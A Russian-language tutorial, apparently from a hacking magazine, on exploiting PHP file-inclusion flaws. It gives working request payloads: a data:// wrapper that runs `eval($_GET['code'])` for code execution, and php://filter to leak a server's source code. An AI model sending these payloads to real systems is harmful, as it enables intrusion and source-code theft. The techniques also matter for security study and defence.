Дополнительные методы инклудов

Есть еще
несколько вариантов, но они
требуют «особых условий» для
реализации. Докручивать инклуд
мы будем двумя способами — с
помощью так называемого
«упаковщика» data и фильтров
filter. Разберем подробнее.

1. Могучий data.

Требования для использования
метода:

a)
allow_url_include должна быть
включена. (allow_url_include =
on в файле php.ini)

b)
Отсутствие символов перед нашим
значением, т.е.
include('./dir/'.$file); не
подходит, а include($file);
отлично подойдет!

Это, конечно же, немного
осложняет ситуацию, однако, если
стоят какиелибо фильтры на
присутствие слов «http://»,
«ftp://» и т.п., то,
естественно, провести RFI не
удастся, тут-то нам и пригодится
данный метод. К примеру, если у
нас есть уязвимый код:

<?php include $_GET["file"]; ?>

Смело составляем запрос

?file=data:application/x-httpd-php;base64,PD8gZXZhbCgkX0dFVFsnY29kZSddKTsgPz4&code=phpinfo();

Разберем подробнее:

data —
непосредственно указывает, что
будем использовать "упаковщик"
data application/x-httpd-php
указывает mime-тип данных, в
нашем случае это тип данных
php-скрипта
base64 —
указывает, что входящие данные
зашифрованы в base64
PD8gZXZhbCgkX0dFVFsnY29kZSddKTsgPz4
— входящие данные (после
расшифровки "<? eval($_GET['code']); ?>") code=phpinfo();—
переменная, используемая в eval
Выполняем запрос и созерцаем
заветный phpinfo().

2. Фильтруем базар
или удобный filter.

Требования для использования
метода:

a)
Отсутствие символов ПЕРЕД нашим
значением в инклуде (аналогично
первому методу).
b) Наличие
соответствующего фильтра (для
просмотра установленных фильтров
использовать функцию
stream_get_filters).

3) PHP версии 5.0.0 и
выше.

Уязвимый код:

<?php include $_GET["file"]; ?>

Составляем запрос:

?file=php://filter/convert.base64-encode/resource=/home/user/www/index.php

Разбор полетов:

php://filter
— указывает, что используются
фильтры convert — указывает,
используются преобразовывающие
фильтры
base64-encode —
указывается сам фильтр
resource —
указывается расположение
требуемого файла

Результатом данного запроса
мы получим исходный код файла
index. php, зашифрованный
base64, останется лишь
расшифровать и изучать исходный
код недруга.

Почитать подробнее о данных
функциях можно на

php.net

← Ранее Как сделать выбор нужных значений, с определенным словом в имени столбца или таблицы при явной SQL-injection

Далее → Как сделать рип сайта

Далее по этой теме
Ранее по этой теме

Обзор эксплойтов

В текущем месяце багокопатели не хотят нас баловать новыми громкими эксплойтами в популярн…

14.05.2011
22 мин на чтение
Сквозь тернии к файлам! Новые уязвимости доступа к файлам в PHP

Все развивается. На смену одних методов приходят другие, продвинутые трюки быстро перестаю…

03.07.2011
14 мин на чтение
Knocked-Out AOL: How The AOL Servers Were Hacked

AOL Corporation has always been a kind of honey pie for all possible kinds of hackers. Mi…

02.11.2010
50 мин на чтение
Админские забавы: глумимся над кулхацкерами и сотрудниками офиса

Когда все настроено и работает как часы, когда пользователи довольны, а босс не достает по…

16.11.2010
18 мин на чтение
Самый лучший квест: Руководство по прохождению HackQuest 2010

В данной публикации описано прохождение большинства предложенных этапов хак-квеста, которы…

13.03.2011
22 мин на чтение
Обзор эксплойтов

Приветствую тебя, читатель! Вот мы и снова встретились на страницах ][. Сегодняшний обзор …

10.04.2011
34 мин на чтение

Социальный взлом: Pen-testing популярного движка соцсети

Социальные сети внезапно стали очень популярны. Сейчас социальная сеть – это и способ поо…

04.03.2010
17 мин на чтение
Проникновение в очаг OpenCart: взлом движка онлайн-магазина

Вот она, весна — время депрессий, мартовских котов и дождей. Делать что-либо совсем не бы…

03.08.2010
13 мин на чтение
Проникновение в очаг OpenCart. Взлом движка онлайн-магазина Opencart

ВОТ ОНА, ВЕСНА — время депрессий, мартовских котов и дождей. Делать что-либо совсем не был…

12.05.2010
13 мин на чтение
Звездный Twitter: взлом аккаунта Стивена Фрая

В лентах новостей зачастую можно прочесть о том, что в очередной раз на Твиттере взломан …

21.10.2009
13 мин на чтение
Пилим xBtit: нестандартные уязвимости скриптов

Названия некоторых функций языка PHP настолько просты и понятны, а принципы работы кажутс…

29.03.2010
19 мин на чтение
Starry Twitter: Hacking the Stephen Fry account

Watching the feeds, one’s can often face the news that another Twitter account of some Br…

24.12.2009
39 мин на чтение

Дополнительные методы инклудов

Обзор эксплойтов

Сквозь тернии к файлам! Новые уязвимости доступа к файлам в PHP

Knocked-Out AOL: How The AOL Servers Were Hacked

Админские забавы: глумимся над кулхацкерами и сотрудниками офиса

Самый лучший квест: Руководство по прохождению HackQuest 2010

Обзор эксплойтов

Социальный взлом: Pen-testing популярного движка соцсети

Проникновение в очаг OpenCart: взлом движка онлайн-магазина

Проникновение в очаг OpenCart. Взлом движка онлайн-магазина Opencart

Звездный Twitter: взлом аккаунта Стивена Фрая

Пилим xBtit: нестандартные уязвимости скриптов

Starry Twitter: Hacking the Stephen Fry account

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Вход через WebTutor. Атакуем Windows через веб-приложение и Microsoft SQL

Семплеры и шедулеры. Разбираем два важных механизма улучшения генеративных картинок

Атака по SMS. Как мы нашли уязвимость в популярном GSM-модеме и раскрутили ее до RCE

Kerberoasting для FreeIPA. Как я искал доступ к домену, а нашел CVE

Трюки

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Карманный Arch. Делаем флешку с живым образом Arch Linux

Последние новости

Обнаружен новый Linux-бэкдор WolfsBane

D-Link снова просит пользователей отказаться от уязвимых роутеров

Американские власти закрыли хакерский маркетплейс PopeyeTools

Более 2000 брандмауэров Palo Alto Networks взломаны через свежие 0-day баги

Администратора шифровальщика Phobos экстрадировали в США и предъявили обвинения